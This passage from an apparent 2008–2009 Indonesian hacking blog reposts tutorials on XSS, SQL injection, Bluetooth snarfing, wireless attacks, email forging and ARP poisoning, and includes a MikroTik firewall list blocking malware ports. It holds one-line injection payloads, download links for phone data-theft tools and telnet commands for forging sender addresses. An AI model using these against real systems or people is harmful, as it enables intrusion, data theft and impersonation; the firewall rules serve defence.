forms can be addresses, bulletin board comments, etc. <br />We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this: <br />http://website/inc/errors.asp?Error=Invalid%20password <br />This displays a custom access denied page that says, “Invalid password”. Seeing a string <br />on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as: <br />http://website/inc/errors.asp?Error=<script%20src=... <br />That is, place the script tags on the URL. <br /> <br /><strong>4) SQL Injection :-</strong> This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted. <br />The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server. <br />example:- http://www.domain.com/index.asp?querystring=sports' or 1=1-- <br /> <br /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6933720470389370490?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-16609990967893415882009-02-15T03:41:00.002+07:002009-02-15T03:47:35.316+07:00<strong>Discovering Bluetooth Devices :- </strong><br /><p>Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range.</p><p><strong>Recommended Tools</strong><br /></p><strong>BlueScanner </strong>It will try to extract as much information as possible for each newly discovered device <a href="http://www.insecure.in/hacktools/BlueScan.rar"><strong>Download</strong></a><br /><strong>BlueSniff </strong>It is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices <strong><a href="http://www.insecure.in/hacktools/BlueSniff.rar">Download</a></strong><br /><strong>BTBrowser</strong> It is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth enabled devices. It works on phones that supports JSR-82 - the Java Bluetooth specification <strong><a href="http://www.insecure.in/hacktools/BTBrowser.rar">Download</a></strong><br />BTCrawler It is a scanner for Windows Mobile based devices. It also implements the BlueJacking and BlueSnarfing attacks -----<br /><br /><strong>Hacking Bluetooth Devices :-</strong><br />There are a variety of different types of bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users. Following are some of the most common types of threats :-<br /><br /><strong>1) BluePrinting Attack :- </strong>Information gathering is the first step in the quest to break into target system. Even BlueTooth devices can be fingerprinted or probed for information gathering using the technique known as BluePrinting. Using this one can determine manufacturer, model, version, etc. for target bluetooth enabled device.<br />Recommended Tools<br /><strong>BluePrint</strong> As the name suggests <strong><a href="http://www.insecure.in/hacktools/BluePrint.zip">Download</a></strong><br /><strong>BTScanner </strong>It is an information gathering tool that allows attacker to query devices without the need to carry out pairing <strong><a href="http://www.insecure.in/hacktools/BTScanner_2.1.tar">Download</a></strong><br /><strong><br />2) BlueJack Attack :- </strong>Bluejacking is the process of sending an anonymous message from a bluetooth enabled phone to another, within a particular range without knowing the exact source of the recieved message to the recepient.<br />Recommended Tools<br /><strong>FreeJack</strong> Bluejacking tool written in JAVA -----<br /><strong>CIHWB</strong> Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Supports BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack <strong><a href="http://www.insecure.in/hacktools/CIHwBT.rar">Download</a></strong><br /><br /><strong>3) BlueSnarf Attack :-</strong> Bluesnarfing is the process of connecting vulnerable mobile phones through bluetooth, without knowing the victim. It involves OBEX protocol by which an attacker can forcibly push/pull sensitive data in/out of the victim's mobile phone, hence also known as OBEX pull attack.<br />This attack requires J2ME enabled mobile phones as the attacker tool. With J2ME enabled phone, just by using bluesnarfing tools like Blooover, Redsnarf, Bluesnarf, etc. an attacker can break into target mobile phone for stealing sensitive data such as address book, photos, mp3, videos, SMS, ......!<br />Recommended Tools<br /><strong>Blooover</strong> It is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable. It can also be used to carry out BlueBug attack <strong><a href="http://www.insecure.in/hacktools/Bloover.rar">Download</a></strong><br /><strong>RedSnarf One</strong> of the best bluesnarfing tool .<br /><strong>BlueSnarfer </strong>It downloads the phone-book of any mobile device vulnerable to Bluesnarfing <strong><a href="http://www.insecure.in/hacktools/BlueSnarfer.gz">Download</a></strong><br /><br /><br />thanks kev<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-1660999096789341588?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-60013021693271596802009-02-15T03:37:00.001+07:002009-02-15T03:41:40.320+07:00Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.<br />The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-<br /><br /><strong>1) Stations and Access Points :- </strong>A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.<br />An access point (AP) is a station that provides frame distribution service to stations associated with it. <br />The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.<br /><br /><strong>2) Channels :- </strong>The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.<br /><br /><strong>3) Wired Equivalent Privacy (WEP) :-</strong> It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.<br /><br /><strong>4) Wireless Network Sniffing :-</strong> Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.<br /><br /><strong>5 ) Passive Scanning :-</strong> Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all. <br /><br /><strong>6) Detection of SSID :-</strong> The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.<br />When the above methods fail, SSID discovery is done by active scanning <br /><br /><strong>7) Collecting the MAC Addresses :-</strong> The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.<br /><br /><strong>8) Collecting the Frames for Cracking WEP/WPA/mix :-</strong> The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP/WPA/mix cracking tool is AirSnort ( http://airsnort.shmoo.com ).<br /><br /><strong>9) Detection of the Sniffers :-</strong> Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.<br /><br /><strong>10) Wireless Spoofing :- </strong>There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.<br /><br /><strong>11) MAC Address Spoofing :- </strong>The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.<br /><br /><strong>12) IP spoofing :-</strong> Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.<br /><br /><strong>13) Frame Spoofing :-</strong> The attacker will inject frames that are valid but whose content is carefully spoofed.<br /><br /><strong>14) Wireless Network Probing :-</strong> The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.<br /><br /><strong>15) AP Weaknesses :-</strong> APs have weaknesses that are both due to design mistakes and user interfaces<br /><br /><strong>16) Trojan AP :</strong>- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.<br /><br /><strong>17) Denial of Service :-</strong> A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.<br /><br /><strong>18) Jamming the Air Waves :-</strong> A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.<br /><br /><strong>19) War Driving :-</strong> Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers. <br />Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.<br /><p> </p><p><strong>Tips for Wireless Home Network Security </strong><br /></p>1) Change Default Administrator Passwords (and Usernames)<br />2) Turn on (Compatible) WPA / WEP Encryption<br />3) Change the Default SSID<br />4) Disable SSID Broadcast <br />5) Assign Static IP Addresses to Devices<br />6) Enable MAC Address Filtering <br />7) Turn Off the Network During Extended Periods of Non-Use<br /><p>8) Position the Router or Access Point Safely</p><p></p><p>- thanks kev<br /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6001302169327159680?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-79186642285787256622009-02-15T03:29:00.005+07:002009-02-15T03:37:45.283+07:00All email communications on the internet are possible by two protocols:<br />1) Simple Mail Transfer Protocol (SMTP port-25)<br />2) Post Office Protocol (POP port-110)<br /><br />E-Mail hacking consists of various techniques as discussed below.<br /><br />1) EMail Tracing :- Generally, the path taken by an email while travelling from sender to receiver can be explained by following diagram.<br /><br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 128px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/SZcqTzVfP1I/AAAAAAAAAGw/WIMbVDqwjqE/s400/mailpath.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302753605938265938" /><br /><p>The most effective and easiest way to trace an email is to analyze it's email headers. This can be done by just viewing the full header of received email.</p><p>Recommended Tools<br />NeoTrace http://www.neotrace.com<br />VisualRoute http://visualroute.visualware.com<br />E-MailTracker http://www.visualware.com<br />-0-------------<br /></p><p>others trik</p><p>----------------</p><p><strong>EMail Forging</strong></p><p> EMail Forging :- Email forging allows an attacker to disguise the source of an email and send it to the victim. Most attackers use this technique to fool the victim into believing that somebody else has send the particular email.<br />The SMTP protocol makes it extremely easy for an attacker to send forged emails to a remote user.<br />Typically an attacker carries out email forging by following steps:<br /><br />1) Start Command Prompt and type the following command-<br />c:/>telnet smtp.mailserver.com 25 or c:/>telnet mail.domain.com 25 <br />example:- c:/>telnet smtp.gmail.com 25<br />The above command opens a telnet connection to the specified remote mail server on port-25. Where port-25 is the default SMTP port on which outgoing mail daemon runs.<br /><br />2) Once you are connected to the mail daemon of remote mail server, you would be greeted with a message similar to following:-<br /><br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 96px;" src="http://2.bp.blogspot.com/_-_ze5jbhUuc/SZcq-Xp7UYI/AAAAAAAAAG4/dFS8_wBjnyo/s400/microsoft1.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302754337242173826" /><br />If you are not familiar with the smtp mail daemon commands then enter the keyword 'help' at daemon which may reveal all the supporting commands as shown below.<br /><br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 109px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/SZcrGPwyCyI/AAAAAAAAAHA/b4v-LmQpRf8/s400/microsoft2.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302754472562395938" /><br />3) The correct sequence of commands to be executed is:-<br />a) helo mailserver1.com<br />b) mail from:abc@mailserver1.com<br />c) rcpt to:xyz@mailserver2.com<br />d) data<br />e) .(dot command represents end of mail body)<br />This all as shown in figure below:<br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 201px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/SZcrU_931UI/AAAAAAAAAHI/_nOGtEiK2qg/s400/forged.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302754726020371778" /><br /> EMail forging by this technique does not possible, if mail relying is disabled by it's service provider.<br />---</p><p> Spam :- Every e-mail account and network on the internet has limited space and bandwidth. This means that if an attacker is able to clog up all the inbox space and bandwidth of the target computer, it could cause lot of inconvenience and unnecessary trouble. Spam e-mails have slowly but surely started clogging up the bandwidth on the internet and the memory space in our inboxes.<br /><br />MailBombing:- Mailbombing is a technique wherein the attacker floods victim's e-mail account with an extremely large (sometimes infinite) number of unsolicited meaningless e-mails. Two different types of mailbombing are-<br /><br />a) Mass Mailbombing<br />b) List Linking Mailbombing<br /><br /></p><p>thanks - kev</p><p><br /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7918664228578725662?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-9372004903758487072009-02-15T03:23:00.000+07:002009-02-15T03:29:13.783+07:00What Does ARP Mean?<br />Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communication between local nodes can be made.<br /><br />On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program is present. This program can be used to display and/or modify ARP cache entries.<br /><br />An example of the "arp" utility's output would look like the following:<br /><br />Windows:<br />> arp -a<br />Interface: 192.168.1.100 .- 0x10003<br />Internet Address Physical Address Type<br />192.168.1.1 00-13-10-23-9a-53 dynamic<br /><br />Linux:<br />$ arp -na<br />? (192.168.1.1) at 00:90:B1:DC:F8:C0 [ether] on eth0<br /><br />FreeBSD:<br />$ arp -na<br />? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0<br /><br /><br />How ARP works?<br />Specifically for Internet Protocol Version 4 (IPv4), ARP maps IP addresses between the Network layer and Data Link layer of the Open System Interconnection (OSI) model.<br />For a more complete and thorough explanation of how address resolution works, and protocol specifics, please consult RFC 826.<br /><br /><br />ARP Protocol Flaws :-<br />ARP's main flaw is in its cache. Knowing that it is possible for ARP to update existing entries as well as add to the cache, this leads one to believe that forged replies can be made, which result in ARP cache poisoning attacks.<br /><br /><br />Terms &amp; Definitions :-<br />ARP Cache Poisoning : Broadcasting forged ARP replies on a local network. In a sense, "fooling" nodes on the network. This can be done because ARP lacks authentication features, thus blindly accepting any request and reply that is received or sent.<br /><br />MAC Address Flooding : An ARP cache poisoning attack that is mainly used in switched environments. By flooding a switch with fake MAC addresses, a switch is overloaded. Because of this, it broadcasts all network traffic to every connected node. This outcome is referred to as "broadcast mode" because, all traffic passing through the switch is broadcasted out like a Hub would do. This then can result in sniffing all network traffic.<br /><br /><br />The ARP Attacks :-<br />1] Connection Hijacking &amp; Interception : Packet or connection hijacking and interception is the act in which any connected client can be victimized into getting their connection manipulated in a way that it is possible to take complete control over.<br /><br />2] Connection Resetting : The name explains itself very well. When we are resetting a client's connection, we are cutting their connection to the system. This can be easily done using specially crafted code to do so. Luckily, we have wonderful software that was made to aid us in doing so.<br /><br />3] Man In The Middle : One of the more prominent ways of attacking another user in order to hijack their traffic, is by means of a Man In The Middle (MITM) attack. Unlike the other attacks, a MITM is more a packet manipulation attack which in the end however does result in packet redirection to the attacker . all traffic will get sent to the attacker doing the MITM attack. This attack however is specific. As opposed to MAC Address Flooding or other attacks against a router/switch, the MITM attack is against a victim, and also can be done outside of a switched environment. Thus meaning, an attack can be executed against a person on the other side of the country.<br /><br />4] Packet Sniffing : Sniffing on a Local Area Network (LAN) is quite easy if the network is segmented via a hub, rather than a switch. It is of course possible to sniff on a switched environment by performing a MAC flood attack. As a result of the MAC flood, the switch will act as a hub, and allow the entire network to be sniffed. This gives you a chance to use any sort of sniffing software available to you to use against the network, and gather packets.<br /><br />5] Denial of Service : MAC Address Flooding can be considered a Denial of service attack. The main idea of the MAC flood, is to generate enough packet data to send toward a switch, attempting to make it panic. This will cause the switch to drop into broadcast mode and broadcast all packet data. This however did not result in a crash, or the service to be dropped, but to be overloaded.<br /><p><br /></p><p>Thanks kev</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-937200490375848707?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-20676403205906080972009-02-15T03:12:00.007+07:002009-02-15T03:22:58.161+07:00<strong>Network Hacking</strong> is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.<br />It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.<br /><br />Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.<br />To ping a particular host the syntax is (at command prompt)-- <br />c:/>ping hostname.com<br /><br /><strong>example:- c:/>ping www.google.com</strong><br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 162px;" src="http://1.bp.blogspot.com/_-_ze5jbhUuc/SZcne0NgYoI/AAAAAAAAAGg/yJRaYniDD2M/s400/ping.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302750496616899202" /><br />Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.<br /><br /><br />Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc. <br />It's syntax is (at command prompt)--<br />c:/>netstat -n<br /><br /><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 111px;" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/SZcnP6XKcSI/AAAAAAAAAGY/XjEyYPLdwGc/s400/netstat.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302750240569979170" /><br /><strong><br />Telnet :-</strong> Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port. <br />The basic syntax of Telnet is (at command prompt)-- <br />c:/>telnet hostname.com<br /><br />By default telnet connects to port 23 of remote computer. <br />So, the complete syntax is-<br />c:/>telnet www.hostname.com port<br /><br />example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21<br /><br /><br />Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination. <br />It's syntax is (at command prompt)-- <br />c:/>tracert www.hostname.com<strong><br />example:- c:/>tracert www.insecure.in<br /></strong><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 210px;" src="http://2.bp.blogspot.com/_-_ze5jbhUuc/SZcn4D7svOI/AAAAAAAAAGo/VgW2MUzjd_w/s400/tracert.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5302750930333908194" /><strong><br /></strong>Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.<br /><br />various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.<br /><br />The information obtained by using tracert command can be further used to find out exact operating system running on target system.<br /><p><br /></p><p>Thanks -=kevin=-</p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2067640320590608097?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-41501479837212142112008-12-24T17:35:00.003+07:002008-12-24T17:40:27.090+07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_-_ze5jbhUuc/SVIRD-67eGI/AAAAAAAAAF4/LsvFHeVLGsY/s1600-h/cisco_dalam.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 73px;" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/SVIRD-67eGI/AAAAAAAAAF4/LsvFHeVLGsY/s400/cisco_dalam.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5283304072986458210" /></a><br /><p>Kami menyelenggarakan <strong>CISCO Learning &amp; Workshop</strong> hari <strong>minggu (11 Januari 2009)</strong> dari <strong>jam 09.00 - 16.00 WIB. </strong><br /></p>Acara ini diselenggarakan sebagai pengetahuan basic/advance mengikuti ujian CISCO Sertifikasi. <br />Untuk informasi lebih lengkapnya Anda dapat menghubungi sekretariat pendaftaran resmi<br />ke management <strong>ISIC di nomor telp. 0761-62886 atau 0761-8365820</strong> setiap hari kerja.<br />Biaya registrasi <strong>Rp.25.000,-</strong> Biaya Learning &amp; Workshop <strong>Rp.300.000,-</strong><br />Segala bentuk pembiayaan harus telah diterima panitia dua hari sebelum tanggal pelaksanaan.<br />Baik melalui pembayaran langsung maupun transfer. <br />Untuk pembayaran melalui transfer, bukti pembayaran harus dikirimkan via fax. di nomor <strong>faximile 0761-62886</strong> atau email :<strong> greenarya.mg@gmail.com</strong><br /><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 273px;" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/SVIRhALSETI/AAAAAAAAAGA/wmeV2DvR6c8/s400/PAMLET+BROSUR+cisco.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5283304571539689778" /><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-4150147983721214211?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-20364091631379210162008-12-08T12:57:00.003+07:002008-12-08T13:11:49.862+07:00<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_-_ze5jbhUuc/STy5KjruHBI/AAAAAAAAAFI/4pD2X3TqbOA/s1600-h/suse.gif"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 269px; height: 202px;" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/STy5KjruHBI/AAAAAAAAAFI/4pD2X3TqbOA/s320/suse.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5277296454399826962" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_-_ze5jbhUuc/STy5KUHMgMI/AAAAAAAAAFA/JKShhHYvqek/s1600-h/mac.gif"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 269px; height: 202px;" src="http://4.bp.blogspot.com/_-_ze5jbhUuc/STy5KUHMgMI/AAAAAAAAAFA/JKShhHYvqek/s320/mac.gif" border="0" alt="" id="BLOGGER_PHOTO_ID_5277296450220097730" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_-_ze5jbhUuc/STy5KQAfP3I/AAAAAAAAAE4/QM3X4WbnRCU/s1600-h/Debian+big1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 150px;" src="http://3.bp.blogspot.com/_-_ze5jbhUuc/STy5KQAfP3I/AAAAAAAAAE4/QM3X4WbnRCU/s320/Debian+big1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5277296449118224242" /></a><br /><p><strong>Linux &amp; Apple Merchandise</strong></p><p>Material: art glass relife</p><p>Dimension: 20 x 8,5cm</p><p><strong>Price: 60.000 IDR (5,5 USD)</strong></p><p><strong><em>contack order:</em><br />Yudhax<br />Jl. Lobak no.27 [Ardath]<br />Pekanbaru - Riau - Indonesia<br />phone/fax: 62-761-62886<br />hp: 0761-8365820<br /><br /></strong></p><p></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2036409163137921016?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-71310756422164731152008-09-11T16:20:00.001+07:002008-09-11T16:27:50.655+07:00Just Documentation :<br /><br />add chain=tcp protocol=tcp dst-port=67-68 action=drop comment=”deny DHCP”<br />add chain=tcp protocol=tcp dst-port=69 action=drop comment=”deny TFTP”<br />add chain=tcp protocol=tcp dst-port=111 action=drop comment=”deny RPC portmapper”<br />add chain=tcp protocol=tcp dst-port=135 action=drop comment=”deny RPC portmapper”<br />add chain=tcp protocol=tcp dst-port=137-139 action=drop comment=”deny NBT”<br />add chain=tcp protocol=tcp dst-port=445 action=drop comment=”deny cifs”<br />add chain=tcp protocol=tcp dst-port=593 action=drop comment=”________”<span id="more-31"></span><br />add chain=tcp protocol=tcp dst-port=1024-1030 action=drop comment=”________”<br />add chain=tcp protocol=tcp dst-port=1080 action=drop comment=”Drop MyDoom”<br />add chain=tcp protocol=tcp dst-port=1214 action=drop comment=”________”<br />add chain=tcp protocol=tcp dst-port=1363 action=drop comment=”ndm requester”<br />add chain=tcp protocol=tcp dst-port=1364 action=drop comment=”ndm server”<br />add chain=tcp protocol=tcp dst-port=1368 action=drop comment=”screen cast”<br />add chain=tcp protocol=tcp dst-port=1373 action=drop comment=”hromgrafx”<br />add chain=tcp protocol=tcp dst-port=1377 action=drop comment=”cichlid”<br />add chain=tcp protocol=tcp dst-port=1433-1434 action=drop comment=”Worm”<br />add chain=tcp protocol=tcp dst-port=2745 action=drop comment=”Bagle Virus”<br />add chain=tcp protocol=tcp dst-port=2283 action=drop comment=”Drop Dumaru.Y”<br />add chain=tcp protocol=tcp dst-port=2535 action=drop comment=”Drop Beagle”<br />add chain=tcp protocol=tcp dst-port=2745 action=drop comment=”Drop Beagle.C-K”<br />add chain=tcp protocol=tcp dst-port=3127-3128 action=drop comment=”Drop MyDoom”<br />add chain=tcp protocol=tcp dst-port=3410 action=drop comment=”Drop Backdoor OptixPro”<br />add chain=tcp protocol=tcp dst-port=4444 action=drop comment=”Worm”<br />add chain=tcp protocol=tcp dst-port=2049 action=drop comment=”deny NFS”<br />add chain=tcp protocol=tcp dst-port=3133 action=drop comment=”deny BackOriffice”<br />add chain=tcp protocol=tcp dst-port=5554 action=drop comment=”Drop Sasser”<br />add chain=tcp protocol=tcp dst-port=8866 action=drop comment=”Drop Beagle.B”<br />add chain=tcp protocol=tcp dst-port=9898 action=drop comment=”Drop Dabber.A-B”<br />add chain=tcp protocol=tcp dst-port=10000 action=drop comment=”Drop Dumaru.Y”<br />add chain=tcp protocol=tcp dst-port=10080 action=drop comment=”Drop MyDoom.B”<br />add chain=tcp protocol=tcp dst-port=12345-12346 action=drop comment=”deny NetBus”<br />add chain=tcp protocol=tcp dst-port=17300 action=drop comment=”Drop Kuang2″<br />add chain=tcp protocol=tcp dst-port=20034 action=drop comment=”deny NetBus”<br />add chain=tcp protocol=tcp dst-port=27374 action=drop comment=”Drop SubSeven”<br />add chain=tcp protocol=tcp dst-port=65506 action=drop comment=”Drop PhatBot, Agobot, Gaobot”<br />add chain=udp protocol=udp dst-port=4444 action=drop comment=”Worm”<br />add chain=udp protocol=udp dst-port=69 action=drop comment=”deny TFTP”<br />add chain=udp protocol=udp dst-port=111 action=drop comment=”deny PRC portmapper”<br />add chain=udp protocol=udp dst-port=135 action=drop comment=”deny PRC portmapper”<br />add chain=udp protocol=udp dst-port=137-139 action=drop comment=”deny NBT”<br />add chain=udp protocol=udp dst-port=2049 action=drop comment=”deny NFS”<br />add chain=udp protocol=udp dst-port=3133 action=drop comment=”deny BackOriffice”<br />add chain=icmp protocol=icmp icmp-options=0:0 action=accept comment=”drop invalid connections”<br />add chain=icmp protocol=icmp icmp-options=3:0 action=accept comment=”allow established connections”<br />add chain=icmp protocol=icmp icmp-options=3:1 action=accept comment=”allow already established connections”<br />add chain=icmp protocol=icmp icmp-options=4:0 action=accept comment=”allow source quench”<br />add chain=icmp protocol=icmp icmp-options=8:0 action=accept comment=”allow echo request”<br />add chain=icmp protocol=icmp icmp-options=11:0 action=accept comment=”allow time exceed”<br />add chain=icmp protocol=icmp icmp-options=12:0 action=accept comment=”allow parameter bad”<br />add chain=icmp action=drop comment=”deny all other types”<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7131075642216473115?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-22299520507164816632008-09-11T16:17:00.001+07:002008-09-11T16:19:19.871+07:00<div class="entry"> <div class="snap_preview"><p>Translasi dari command ip-tables pada linux ke mikrotik (sumber command syntax linux dari : <a href="http://tldp.org/HOWTO/TransparentProxy-6.html" target="_blank">http://tldp.org/HOWTO/TransparentProxy-6.html</a>)</p> <p>Method pertama :</p> <ul><li>iptables 